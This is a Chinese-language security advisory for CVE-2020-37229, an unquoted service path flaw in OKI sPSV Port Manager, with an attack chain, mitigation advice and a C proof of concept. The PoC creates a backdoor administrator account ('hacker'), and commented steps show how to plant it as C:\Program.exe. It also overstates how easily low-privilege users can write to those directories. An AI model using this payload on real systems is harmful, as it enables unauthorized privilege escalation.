CVE-2020-37229 CVSS 7.8 高危

CVE-2020-37229 OKI sPSV未引用服务路径提权漏洞

披露日期: 2026-05-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2020-37229

漏洞类型

未引用服务路径

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OKI sPSV Port Manager

漏洞概述

OKI sPSV Port Manager 1.0.41版本中存在未引用服务路径漏洞。该漏洞源于`sPSVOpLclSrv`服务的路径未正确引用，导致本地攻击者可以在服务路径的目录中放置恶意可执行文件。当服务重启或系统重启时，该恶意文件将以LocalSystem权限运行，从而允许攻击者提升权限并完全控制受影响系统。

技术细节

该漏洞属于典型的Windows未引用服务路径漏洞。在Windows系统中，如果服务路径包含空格但未用引号括起来，系统在解析路径时会尝试在每一个空格处截断并查找可执行文件。例如，若服务路径为`C:\Program Files\OKI\sPSVOpLclSrv.exe`且未加引号，系统会依次尝试执行`C:\Program.exe`、`C:\Program Files\OKI\sPSVOpLclSrv.exe`等。攻击者只需拥有低权限账户，即可在系统的根目录（如C:\）或`Program Files`目录下创建一个名为`Program.exe`的恶意程序。由于该服务是以LocalSystem权限运行的，当服务启动或重启时，系统会误执行攻击者放置的恶意程序，从而使攻击者获得系统最高权限，实现从低权限用户到管理员权限的垂直提权。

攻击链分析

STEP 1

侦察

攻击者枚举系统服务，发现sPSVOpLclSrv服务的ImagePath未加引号且路径包含空格。

STEP 2

准备

攻击者编译一个恶意程序（如添加后门用户的二进制文件），并将其重命名为截断路径所需的名称（例如Program.exe）。

STEP 3

投递

攻击者利用低权限账户，将恶意程序复制到服务路径截断点对应的目录中（如C:\Program.exe）。

STEP 4

触发

攻击者等待系统重启，或手动触发服务重启。

STEP 5

利用

Windows服务管理器启动服务时，由于路径解析错误，优先执行了攻击者的恶意程序。该程序以LocalSystem权限运行，成功提升权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>
#include <stdlib.h>

// Malicious payload example: Adds a user to the administrators group
// Attacker would compile this and place it at C:\Program.exe

int main() {
    // Command to add a user "hacker" with password "123456"
    char* cmd = "net user hacker 123456 /add && net localgroup administrators hacker /add";
    
    // Execute the command with system privileges
    system(cmd);
    
    // Optional: Clean up or hide the executable
    return 0;
}

/*
PowerShell commands to exploit the vulnerability:

1. Check the service configuration:
   sc.exe qc sPSVOpLclSrv

2. Identify the unquoted path (e.g., C:\Program Files\OKI...).

3. Compile the malicious C++ code above to 'Program.exe'.

4. Copy the malicious executable to the vulnerable path segment:
   copy Program.exe C:\Program.exe

5. Restart the service to trigger the exploit:
   Restart-Service -Name "sPSVOpLclSrv"

Alternatively, wait for a system reboot.
*/

影响范围

OKI sPSV Port Manager 1.0.41

防御指南

临时缓解措施

如果无法立即升级软件，建议通过注册表编辑器（regedit）定位到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sPSVOpLclSrv，将ImagePath的值从C:\Program Files\OKI\...修改为"C:\Program Files\OKI\..."（即添加双引号）。修改完成后需重启服务或系统生效。此外，应加强文件系统权限控制，防止普通用户在敏感目录下创建文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表